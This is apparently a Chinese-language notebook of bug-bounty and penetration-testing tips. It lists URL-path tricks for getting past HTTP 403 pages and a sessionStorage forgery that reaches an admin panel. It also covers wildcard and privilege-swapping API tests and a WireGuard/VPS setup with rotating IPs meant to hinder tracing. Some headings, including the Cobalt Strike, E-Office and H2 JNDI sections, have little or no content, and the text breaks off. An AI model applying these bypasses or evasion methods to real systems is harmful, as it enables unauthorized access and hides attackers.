随手记

一、$2,100!更专业地打破403访问控制

site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)

二、勉强能用 匿名上网方案

在腾讯云2h2g 100M带宽的云服务器上(以下简称vps)安装docker版wireguard,形成VPN server端。openwrt的WAN口通过插有物联网卡的华为移动路由pro上网,在openwrt的wireguard软件中填写server端生成的配置信息,启动wg后即可在openwrt上生成一块VPN虚拟网卡wg0,此时openwrt和vps将在同一个虚拟网络10.0.8.0/24下,最后在openwrt上添加一条路由,将0.0.0.0/0 的流量指定从虚拟网卡wg0走。笔记本、工作站等上网设备通过openwrt的LAN或AP接入openwrt软路由的网络,所有设备上网的出口都将是VPS的IP。vps可通过脚本一键购买、部署wiregaurd环境等,实现快速切换ip,若干时间间隔更换IP,极大提高溯源难度。同时也可以在openwrt上安装openclash、ss、passwall等服务,实现无感知科学上网。

三、企业级SRC挖掘-前端sessionStorage绕过

  1. Ctrl+u查看前端源码,寻找登录逻辑,发现了个好东西。

    sessionStorage.setItem("Account", $("#Account").val());
    当登录成功后,设置⼀个sessionStorage,然后跳转到后台。那直接伪造⼀个sessionStorage不就完了。
    
  2. 控制台中输⼊sessionStorage.setItem('Account','admin'),回⻋。访问index.aspx,直接进去后台。

四、CobaltStrike分析-beacon 解析

五、【漏洞预警】泛微 E-Office 命令注入和任意文件上传漏洞

已写 poc

六、逻辑测试:---信息收集到接管

  1. 抓包,更改collegeId=%,也进行模糊匹配,即可获取到全部培训任意的基本信息
  2. 越权1 /v1/user/person/basic/userld的接口,发挥下想象力,这里的person是普通权限,改为admin。

七、H2 JNDI注入

  1. 启动H2后提交,其上方方法中参数driver就是Driver Class,参数2 url就是如下提交的JDBC URL

    Untitled